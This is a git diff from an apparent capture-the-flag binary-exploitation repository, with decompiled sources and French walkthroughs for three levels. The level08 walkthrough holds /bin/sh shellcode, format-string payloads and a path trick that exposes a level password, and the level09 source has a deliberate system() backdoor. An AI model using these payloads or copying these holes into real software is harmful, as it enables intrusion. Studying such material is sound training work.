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 0x18 == 0xb7)) { + puts(" *** ERROR! ***"); + puts(" This index is reserved for wil!"); + puts(" *** ERROR! 
***"); + uVar3 = 1; + } + else { + *(uint *)(uVar2 * 4 + param_1) = uVar1; + uVar3 = 0; + } + return uVar3; +} + +undefined4 read_number(int param_1) +{ + int iVar1; + + printf(" Index: "); + iVar1 = get_unum(); + printf(" Number at data[%u] is %u\n",iVar1,*(undefined4 *)(iVar1 * 4 + param_1)); + return 0; +} + +undefined4 main(undefined4 param_1,char **param_2,char **param_3) +{ + char cVar1; + int iVar2; + uint uVar3; + undefined4 *puVar4; + char *pcVar5; + byte *pbVar6; + int in_GS_OFFSET; + bool bVar7; + bool bVar8; + bool bVar9; + byte bVar10; + char **local_1c8; + char **local_1c4; + undefined4 local_1bc [100]; + undefined4 local_2c; + undefined4 local_28; + undefined4 local_24; + undefined4 local_20; + undefined4 local_1c; + undefined4 local_18; + int local_14; + + bVar10 = 0; + local_1c4 = param_2; + local_1c8 = param_3; + local_14 = *(int *)(in_GS_OFFSET + 0x14); + local_2c = 0; + local_28 = 0; + local_24 = 0; + local_20 = 0; + local_1c = 0; + local_18 = 0; + puVar4 = local_1bc; + for (iVar2 = 100; iVar2 != 0; iVar2 = iVar2 + -1) { + *puVar4 = 0; + puVar4 = puVar4 + 1; + } + for (; *local_1c4 != (char *)0x0; local_1c4 = local_1c4 + 1) { + uVar3 = 0xffffffff; + pcVar5 = *local_1c4; + do { + if (uVar3 == 0) break; + uVar3 = uVar3 - 1; + cVar1 = *pcVar5; + pcVar5 = pcVar5 + (uint)bVar10 * -2 + 1; + } while (cVar1 != '\0'); + memset(*local_1c4,0,~uVar3 - 1); + } + for (; *local_1c8 != (char *)0x0; local_1c8 = local_1c8 + 1) { + uVar3 = 0xffffffff; + pcVar5 = *local_1c8; + do { + if (uVar3 == 0) break; + uVar3 = uVar3 - 1; + cVar1 = *pcVar5; + pcVar5 = pcVar5 + (uint)bVar10 * -2 + 1; + } while (cVar1 != '\0'); + memset(*local_1c8,0,~uVar3 - 1); + } + puts( + "----------------------------------------------------\n Welcome to wil\'s crappy number stora ge service! 
\n----------------------------------------------------\n Commands: \n store - store a number into the data storage \n read - read a number from the data storage \n quit - exit the program \n----------------------------------------------------\n wil has reserved some storage :> \n----------------------------------------------------\n" + ); + do { + printf("Input command: "); + local_2c = 1; + fgets((char *)&local_28,0x14,stdin); + uVar3 = 0xffffffff; + puVar4 = &local_28; + do { + if (uVar3 == 0) break; + uVar3 = uVar3 - 1; + cVar1 = *(char *)puVar4; + puVar4 = (undefined4 *)((int)puVar4 + (uint)bVar10 * -2 + 1); + } while (cVar1 != '\0'); + uVar3 = ~uVar3; + bVar7 = uVar3 == 1; + bVar9 = uVar3 == 2; + *(undefined *)((int)&local_2c + uVar3 + 2) = 0; + iVar2 = 5; + puVar4 = &local_28; + pbVar6 = (byte *)"store"; + do { + if (iVar2 == 0) break; + iVar2 = iVar2 + -1; + bVar7 = *(byte *)puVar4 < *pbVar6; + bVar9 = *(byte *)puVar4 == *pbVar6; + puVar4 = (undefined4 *)((int)puVar4 + (uint)bVar10 * -2 + 1); + pbVar6 = pbVar6 + (uint)bVar10 * -2 + 1; + } while (bVar9); + bVar8 = false; + bVar7 = (!bVar7 && !bVar9) == bVar7; + if (bVar7) { + local_2c = store_number(local_1bc); + } + else { + iVar2 = 4; + puVar4 = &local_28; + pbVar6 = &DAT_08048d61; + do { + if (iVar2 == 0) break; + iVar2 = iVar2 + -1; + bVar8 = *(byte *)puVar4 < *pbVar6; + bVar7 = *(byte *)puVar4 == *pbVar6; + puVar4 = (undefined4 *)((int)puVar4 + (uint)bVar10 * -2 + 1); + pbVar6 = pbVar6 + (uint)bVar10 * -2 + 1; + } while (bVar7); + bVar9 = false; + bVar7 = (!bVar8 && !bVar7) == bVar8; + if (bVar7) { + local_2c = read_number(local_1bc); + } + else { + iVar2 = 4; + puVar4 = &local_28; + pbVar6 = &DAT_08048d66; + do { + if (iVar2 == 0) break; + iVar2 = iVar2 + -1; + bVar9 = *(byte *)puVar4 < *pbVar6; + bVar7 = *(byte *)puVar4 == *pbVar6; + puVar4 = (undefined4 *)((int)puVar4 + (uint)bVar10 * -2 + 1); + pbVar6 = pbVar6 + (uint)bVar10 * -2 + 1; + } while (bVar7); + if ((!bVar9 && !bVar7) == bVar9) { + if 
(local_14 == *(int *)(in_GS_OFFSET + 0x14)) { + return 0; + } + /* WARNING: Subroutine does not return */ + __stack_chk_fail(); + } + } + } + if (local_2c == 0) { + printf(" Completed %s command successfully\n",&local_28); + } + else { + printf(" Failed to do %s command\n",&local_28); + } + local_28 = 0; + local_24 = 0; + local_20 = 0; + local_1c = 0; + local_18 = 0; + } while( true ); +} diff --git a/level07/walkthrough b/level07/walkthrough index d2481d0..8db872e 100644 --- a/level07/walkthrough +++ b/level07/walkthrough @@ -1,3 +1,9 @@ +On peut voir dans le code grace a ghidra qu'on ecrit a l'addresse "index * 4 + array", la maniere dont l'asm le fait c'est index << 2 + array. On peut donc bypass la protection tout les 3 en ajoutant 2^31 qui n'est pas un multiple de 3 ((3k+n)%3 != 0 si n%3 != 0). A partir de ca on peut ecrire un shellcode dans la memoire, ensuite j'overide la got via l'ancienne methode. + + +Ici bas la methode que j'essayais de faire pendant des jours alors que ca marche pas mais ca aurait ete la classe.............. +--------------------------------------------------------------------------------- + -1040108880On peut ecrire que 8 octets sur 12 "/bin/sh" c'est 8 char avec le '\0' donc ok pour le modulo 
diff --git a/level08/Ressources/level08 b/level08/Ressources/level08 deleted file mode 100755 index 49adcdb1c5506d015dc58fcea06feecc3ed1701e..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12975 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 diff --git a/level08/source b/level08/source new file mode 100644 index 0000000..44cf380 --- /dev/null +++ b/level08/source 
@@ -0,0 +1,113 @@
+void log_wrapper(FILE *param_1,char *param_2,char *param_3)
+{
+ char cVar1;
+ size_t sVar2;
+ ulong uVar3;
+ ulong uVar4;
+ char *pcVar5;
+ long in_FS_OFFSET;
+ byte bVar6;
+ undefined8 local_120;
+ char local_118 [264];
+ long local_10;
+
+ bVar6 = 0;
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ local_120 = param_1;
+ strcpy(local_118,param_2);
+ uVar3 = 0xffffffffffffffff;
+ pcVar5 = local_118;
+ do {
+ if (uVar3 == 0) break;
+ uVar3 = uVar3 - 1;
+ cVar1 = *pcVar5;
+ pcVar5 = pcVar5 + (ulong)bVar6 * -2 + 1;
+ } while (cVar1 != '\0');
+ uVar4 = 0xffffffffffffffff;
+ pcVar5 = local_118;
+ do {
+ if (uVar4 == 0) break;
+ uVar4 = uVar4 - 1;
+ cVar1 = *pcVar5;
+ pcVar5 = pcVar5 + (ulong)bVar6 * -2 + 1;
+ } while (cVar1 != '\0');
+ snprintf(local_118 + (~uVar4 - 1),0xfe - (~uVar3 - 1),param_3);
+ sVar2 = strcspn(local_118,"\n");
+ local_118[sVar2] = '\0';
+ fprintf(local_120,"LOG: %s\n",local_118);
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return;
+}
+
+undefined8 main(int param_1,undefined8 *param_2)
+{
+ char cVar1;
+ int __fd;
+ int iVar2;
+ FILE *pFVar3;
+ FILE *__stream;
+ ulong uVar4;
+ undefined8 *puVar5;
+ long in_FS_OFFSET;
+ byte bVar6;
+ char local_79;
+ undefined8 local_78;
+ undefined2 local_70;
+ char local_6e;
+ long local_10;
+
+ bVar6 = 0;
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ local_79 = -1;
+ if (param_1 != 2) {
+ printf("Usage: %s filename\n",*param_2);
+ }
+ pFVar3 = fopen("./backups/.log","w");
+ if (pFVar3 == (FILE *)0x0) {
+ printf("ERROR: Failed to open %s\n","./backups/.log");
+ /* WARNING: Subroutine does not return */
+ exit(1);
+ }
+ log_wrapper(pFVar3,"Starting back up: ",param_2[1]);
+ __stream = fopen((char *)param_2[1],"r");
+ if (__stream == (FILE *)0x0) {
+ printf("ERROR: Failed to open %s\n",param_2[1]);
+ /* WARNING: Subroutine does not return */
+ exit(1);
+ }
+ local_78 = 0x70756b6361622f2e;
+ local_70 = 0x2f73;
+ 
local_6e = '\0'; + uVar4 = 0xffffffffffffffff; + puVar5 = &local_78; + do { + if (uVar4 == 0) break; + uVar4 = uVar4 - 1; + cVar1 = *(char *)puVar5; + puVar5 = (undefined8 *)((long)puVar5 + (ulong)bVar6 * -2 + 1); + } while (cVar1 != '\0'); + strncat((char *)&local_78,(char *)param_2[1],99 - (~uVar4 - 1)); + __fd = open((char *)&local_78,0xc1,0x1b0); + if (__fd < 0) { + printf("ERROR: Failed to open %s%s\n","./backups/",param_2[1]); + /* WARNING: Subroutine does not return */ + exit(1); + } + while( true ) { + iVar2 = fgetc(__stream); + local_79 = (char)iVar2; + if (local_79 == -1) break; + write(__fd,&local_79,1); + } + log_wrapper(pFVar3,"Finished back up ",param_2[1]); + fclose(__stream); + close(__fd); + if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { + /* WARNING: Subroutine does not return */ + __stack_chk_fail(); + } + return 0; +} diff --git a/level08/walkthrough b/level08/walkthrough index 06b88df..87b70ad 100644 --- a/level08/walkthrough +++ b/level08/walkthrough @@ -1,44 +1,7 @@ -load shellcode in env with nop slide +On a un binaire qui prend le contenu d'un fichier et le copie colle dans un dossier backup. Si on essaye de le lancer sur le pass du level09 ca ne fonctionne pas a cause d'une histoire de path. On va donc utiliser le fait que le path est relatif et recreer un dossier backup dans /tmp avec backups/home/users/level09/ -level08@OverRide:~$ echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" > shellcode.bin -level08@OverRide:~$ export SHELLCODE=$(cat shellcode.bin) -level08@OverRide:~$ - - -(gdb) p (char *)getenv("SHELLCODE") -$1 = 0xffffffffffffe892
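Review bot: In log_wrapper the third argument is used as the snprintf format string, `snprintf(local_118 + (~uVar4 - 1),0xfe - (~uVar3 - 1),param_3);`, and main passes `param_2[1]` (argv[1]) in that position, so the user-supplied file name is interpreted as a format (CWE-134); the hardened form is `snprintf(local_118 + (~uVar4 - 1),0xfe - (~uVar3 - 1),"%s",param_3);`, and since this file is kept as decompiled output for the walkthrough, a one-line comment at that call marking it as the user-controlled format sink would help readers more than the surrounding strlen loops do. In main the usage branch `if (param_1 != 2) { printf(...); }` does not exit, so a run with no argument continues into log_wrapper and fopen with `param_2[1]` equal to NULL; an `exit(1);` after the printf closes that path. The copy loop stops at the first input byte equal to 0xff because `local_79 = (char)iVar2; if (local_79 == -1) break;` compares the truncated char rather than the int fgetc returned, so binary files are silently truncated; `if (iVar2 == -1) break;` fixes it. The log handle in `pFVar3` is never fclose'd and the `write` return value is unchecked, so a short write or a write error leaves the backup incomplete without any report.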
- -need to override ret pointer with 0xffffffffffffe892. For this we are going to write e892, then ffff 3 times. Kinda like level05. we will override log_wrapper ret addr cause its fastest. - -Better version (file doesn't need to exist as log_wrapper is called before fopen) - -level08@OverRide:~$ env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%11\$9x'*20)") -ERROR: Failed to open AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x -level08@OverRide:~$ cat backups/.log -LOG: Starting back up: AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 -level08@OverRide:~$ - -with env -i : -Breakpoint 1, 0x0000000000400a5a in main () -(gdb) p (char *)getenv("SHELLCODE") -$1 = 0xffffffffffffef79
- - - -env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABB\xc8\xeb\xff\xff\xff\x7f\x00\x00DDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%17lx'*10+'%n')") - - -actually its way simpler T_T : - -level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/ -level08@OverRide:~$ cd /tmp -level08@OverRide:/tmp$ ~/level08 /home/users/level09/pass -ERROR: Failed to open /home/users/level09/pass -level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass -level08@OverRide:/tmp$ cat backups/ -home/ .log -level08@OverRide:/tmp$ cat backups/home/users/level09/.pass -fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S -level08@OverRide:/tmp$ exit -logout -Connection to localhost closed. +level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/ +level08@OverRide:~$ cd /tmp +level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass +level08@OverRide:/tmp$ cat backups/home/users/level09/.pass +fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S 
diff --git a/level09/Ressources/level09 b/level09/Ressources/level09 deleted file mode 100755 index 57c0d8fd40ca4b277da3b0383c6cfa6b6271a683..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12959 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 diff --git a/level09/source b/level09/source new file mode 100644 index 0000000..d7c3a20 --- /dev/null +++ b/level09/source 
@@ -0,0 +1,82 @@
+void secret_backdoor(void)
+{
+ char local_88 [128];
+
+ fgets(local_88,0x80,stdin);
+ system(local_88);
+ return;
+}
+
+
+void set_username(long param_1)
+{
+ long lVar1;
+ undefined8 *puVar2;
+ undefined8 local_98 [17];
+ int local_c;
+
+ puVar2 = local_98;
+ for (lVar1 = 0x10; lVar1 != 0; lVar1 = lVar1 + -1) {
+ *puVar2 = 0;
+ puVar2 = puVar2 + 1;
+ }
+ puts(">: Enter your username");
+ printf(">>: ");
+ fgets((char *)local_98,0x80,stdin);
+ for (local_c = 0; (local_c < 0x29 && (*(char *)((long)local_98 + (long)local_c) != '\0'));
+ local_c = local_c + 1) {
+ *(undefined *)(param_1 + 0x8c + (long)local_c) = *(undefined *)((long)local_98 + (long)local_c);
+ }
+ printf(">: Welcome, %s",param_1 + 0x8c);
+ return;
+}
+
+void set_msg(char *param_1)
+{
+ long lVar1;
+ undefined8 *puVar2;
+ undefined8 local_408 [128];
+
+ puVar2 = local_408;
+ for (lVar1 = 0x80; lVar1 != 0; lVar1 = lVar1 + -1) {
+ *puVar2 = 0;
+ puVar2 = puVar2 + 1;
+ }
+ puts(">: Msg @Unix-Dude");
+ printf(">>: ");
+ fgets((char *)local_408,0x400,stdin);
+ strncpy(param_1,(char *)local_408,(long)*(int *)(param_1 + 0xb4));
+ return;
+}
+
+void handle_msg(void)
+{
+ undefined local_c8 [140];
